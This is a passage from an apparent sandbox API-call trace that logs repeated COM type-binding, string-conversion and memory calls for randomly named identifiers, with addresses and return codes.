ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x3f8 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x3f8) returned 0x0 [0060.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x53718f6, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="I7jpbwTh") returned 9 [0060.245] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="I7jpbwTh", lHashVal=0x109e0d, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x3f8 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x3f8) returned 0x0 [0060.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x53718f6, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="I7jpbwTh") returned 9 [0060.246] ITypeComp:RemoteBind (in: This=0x87cef08, szName="I7jpbwTh", lHashVal=0x109e0d, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x3f8 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x3f8) returned 0x0 [0060.246] CRetailMalloc_Alloc () returned 0x87fc500 [0060.246] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x9, _Src=0x53718f6 | out: _Dst=0x87fc500) returned 0x0 [0060.246] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d208c2, cbMultiByte=16, lpWideCharStr=0x347614, cchWideChar=17 | out: lpWideCharStr="_B_var_I7jpbwTh") returned 16 [0060.247] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_I7jpbwTh", lHashVal=0x107596, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.247] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x53718f6 | out: _Dst=0x34767c) returned 0x0 [0060.247] CRetailMalloc_Free () returned 0x65c0301 [0060.247] ITypeComp:RemoteBind (in: This=0x87ce890, szName="WzxquDWs", lHashVal=0x1033a6, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x3fa | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x3fa) returned 0x0 [0060.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x537191e, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="WzxquDWs") returned 9 [0060.247] ITypeComp:RemoteBind (in: This=0x87ce668, szName="WzxquDWs", lHashVal=0x1033a6, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x3fa | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x3fa) returned 0x0 [0060.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x537191e, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="WzxquDWs") returned 9 [0060.247] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="WzxquDWs", lHashVal=0x1033a6, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x3fa | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x3fa) returned 0x0 [0060.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x537191e, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="WzxquDWs") returned 9 [0060.248] ITypeComp:RemoteBind (in: This=0x87cef08, szName="WzxquDWs", lHashVal=0x1033a6, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x3fa | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x3fa) returned 0x0 [0060.248] CRetailMalloc_Alloc () returned 0x87fc500 [0060.248] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x9, _Src=0x537191e | out: _Dst=0x87fc500) returned 0x0 [0060.249] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d208ee, cbMultiByte=16, lpWideCharStr=0x347614, cchWideChar=17 | out: lpWideCharStr="_B_var_WzxquDWs") returned 16 [0060.249] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_WzxquDWs", lHashVal=0x10fbed, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.249] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x537191e | out: _Dst=0x34767c) returned 0x0 [0060.249] CRetailMalloc_Free () returned 0x65c0301 [0060.249] ITypeComp:RemoteBind (in: This=0x87ce890, szName="O7Sfg", lHashVal=0x10b921, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x3fc | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x3fc) returned 0x0 [0060.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371946, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="O7Sfg") returned 6 [0060.249] ITypeComp:RemoteBind (in: This=0x87ce668, szName="O7Sfg", lHashVal=0x10b921, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x3fc | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x3fc) returned 0x0 [0060.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371946, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="O7Sfg") returned 6 [0060.250] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="O7Sfg", lHashVal=0x10b921, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x3fc | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x3fc) returned 0x0 [0060.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371946, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="O7Sfg") returned 6 [0060.250] ITypeComp:RemoteBind (in: This=0x87cef08, szName="O7Sfg", lHashVal=0x10b921, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x3fc | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x3fc) returned 0x0 [0060.250] CRetailMalloc_Alloc () returned 0x87fc500 [0060.250] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x6, _Src=0x5371946 | out: _Dst=0x87fc500) returned 0x0 [0060.251] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d2091a, cbMultiByte=13, lpWideCharStr=0x347614, cchWideChar=14 | out: lpWideCharStr="_B_var_O7Sfg") returned 13 [0060.251] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_O7Sfg", lHashVal=0x107d0e, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.251] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x5371946 | out: _Dst=0x34767c) returned 0x0 [0060.251] CRetailMalloc_Free () returned 0x65c0301 [0060.251] ITypeComp:RemoteBind (in: This=0x87ce890, szName="IbrLmiv", lHashVal=0x1008a5, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x3fe | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x3fe) returned 0x0 [0060.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x537196a, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="IbrLmiv") returned 8 [0060.252] ITypeComp:RemoteBind (in: This=0x87ce668, szName="IbrLmiv", lHashVal=0x1008a5, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x3fe | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x3fe) returned 0x0 [0060.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x537196a, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="IbrLmiv") returned 8 [0060.252] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="IbrLmiv", lHashVal=0x1008a5, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x3fe | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x3fe) returned 0x0 [0060.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x537196a, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="IbrLmiv") returned 8 [0060.252] ITypeComp:RemoteBind (in: This=0x87cef08, szName="IbrLmiv", lHashVal=0x1008a5, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x3fe | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x3fe) returned 0x0 [0060.253] CRetailMalloc_Alloc () returned 0x87fc500 [0060.253] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x8, _Src=0x537196a | out: _Dst=0x87fc500) returned 0x0 [0060.253] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20946, cbMultiByte=15, lpWideCharStr=0x347614, cchWideChar=16 | out: lpWideCharStr="_B_var_IbrLmiv") returned 15 [0060.253] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_IbrLmiv", lHashVal=0x100c29, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.253] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x537196a | out: _Dst=0x34767c) returned 0x0 [0060.254] CRetailMalloc_Free () returned 0x65c0301 [0060.254] ITypeComp:RemoteBind (in: This=0x87ce890, szName="BityJHD", lHashVal=0x10f7cf, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x400 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x400) returned 0x0 [0060.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x537198e, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="BityJHD") returned 8 [0060.254] ITypeComp:RemoteBind (in: This=0x87ce668, szName="BityJHD", lHashVal=0x10f7cf, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x400 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x400) returned 0x0 [0060.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x537198e, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="BityJHD") returned 8 [0060.254] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="BityJHD", lHashVal=0x10f7cf, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x400 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x400) returned 0x0 [0060.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x537198e, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="BityJHD") returned 8 [0060.255] ITypeComp:RemoteBind (in: This=0x87cef08, szName="BityJHD", lHashVal=0x10f7cf, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x400 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x400) returned 0x0 [0060.255] CRetailMalloc_Alloc () returned 0x87fc500 [0060.255] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x8, _Src=0x537198e | out: _Dst=0x87fc500) returned 0x0 [0060.256] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20972, cbMultiByte=15, lpWideCharStr=0x347614, cchWideChar=16 | out: lpWideCharStr="_B_var_BityJHD") returned 15 [0060.256] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_BityJHD", lHashVal=0x10fb53, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.256] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x537198e | out: _Dst=0x34767c) returned 0x0 [0060.256] CRetailMalloc_Free () returned 0x65c0301 [0060.256] ITypeComp:RemoteBind (in: This=0x87ce890, szName="LOsRBgvW", lHashVal=0x100bb7, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x402 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x402) returned 0x0 [0060.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x53719b2, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="LOsRBgvW") returned 9 [0060.256] ITypeComp:RemoteBind (in: This=0x87ce668, szName="LOsRBgvW", lHashVal=0x100bb7, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x402 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x402) returned 0x0 [0060.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x53719b2, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="LOsRBgvW") returned 9 [0060.256] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="LOsRBgvW", lHashVal=0x100bb7, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x402 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x402) returned 0x0 [0060.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x53719b2, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="LOsRBgvW") returned 9 [0060.257] ITypeComp:RemoteBind (in: This=0x87cef08, szName="LOsRBgvW", lHashVal=0x100bb7, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x402 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x402) returned 0x0 [0060.257] CRetailMalloc_Alloc () returned 0x87fc500 [0060.257] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x9, _Src=0x53719b2 | out: _Dst=0x87fc500) returned 0x0 [0060.258] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d2099e, cbMultiByte=16, lpWideCharStr=0x347614, cchWideChar=17 | out: lpWideCharStr="_B_var_LOsRBgvW") returned 16 [0060.258] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_LOsRBgvW", lHashVal=0x10e37f, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.258] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x53719b2 | out: _Dst=0x34767c) returned 0x0 [0060.258] CRetailMalloc_Free () returned 0x65c0301 [0060.258] ITypeComp:RemoteBind (in: This=0x87ce890, szName="QS3g2TPfb", lHashVal=0x1071bc, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x404 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x404) returned 0x0 [0060.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x53719da, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="QS3g2TPfb") returned 10 [0060.258] ITypeComp:RemoteBind (in: This=0x87ce668, szName="QS3g2TPfb", lHashVal=0x1071bc, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x404 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x404) returned 0x0 [0060.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x53719da, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="QS3g2TPfb") returned 10 [0060.259] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="QS3g2TPfb", lHashVal=0x1071bc, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x404 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x404) returned 0x0 [0060.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x53719da, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="QS3g2TPfb") returned 10 [0060.259] ITypeComp:RemoteBind (in: This=0x87cef08, szName="QS3g2TPfb", lHashVal=0x1071bc, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x404 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x404) returned 0x0 [0060.259] CRetailMalloc_Alloc () returned 0x87504c0 [0060.259] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x53719da | out: _Dst=0x87504c0) returned 0x0 [0060.260] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d209ca, cbMultiByte=17, lpWideCharStr=0x347614, cchWideChar=18 | out: lpWideCharStr="_B_var_QS3g2TPfb") returned 17 [0060.260] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_QS3g2TPfb", lHashVal=0x107b01, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.260] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x53719da | out: _Dst=0x34767c) returned 0x0 [0060.260] CRetailMalloc_Free () returned 0xcaa0401 [0060.260] ITypeComp:RemoteBind (in: This=0x87ce890, szName="wwpFJq3d4", lHashVal=0x107433, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x406 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x406) returned 0x0 [0060.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371a02, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="wwpFJq3d4") returned 10 [0060.261] ITypeComp:RemoteBind (in: This=0x87ce668, szName="wwpFJq3d4", lHashVal=0x107433, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x406 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x406) returned 0x0 [0060.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371a02, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="wwpFJq3d4") returned 10 [0060.261] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="wwpFJq3d4", lHashVal=0x107433, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x406 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x406) returned 0x0 [0060.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371a02, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="wwpFJq3d4") returned 10 [0060.262] ITypeComp:RemoteBind (in: This=0x87cef08, szName="wwpFJq3d4", lHashVal=0x107433, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x406 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x406) returned 0x0 [0060.262] CRetailMalloc_Alloc () returned 0x87504c0 [0060.262] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x5371a02 | out: _Dst=0x87504c0) returned 0x0 [0060.263] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d209fa, cbMultiByte=17, lpWideCharStr=0x347614, cchWideChar=18 | out: lpWideCharStr="_B_var_wwpFJq3d4") returned 17 [0060.263] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_wwpFJq3d4", lHashVal=0x107d78, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.263] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x5371a02 | out: _Dst=0x34767c) returned 0x0 [0060.263] CRetailMalloc_Free () returned 0xcaa0401 [0060.263] ITypeComp:RemoteBind (in: This=0x87ce890, szName="v4xGOtmY", lHashVal=0x10eab7, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x408 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, 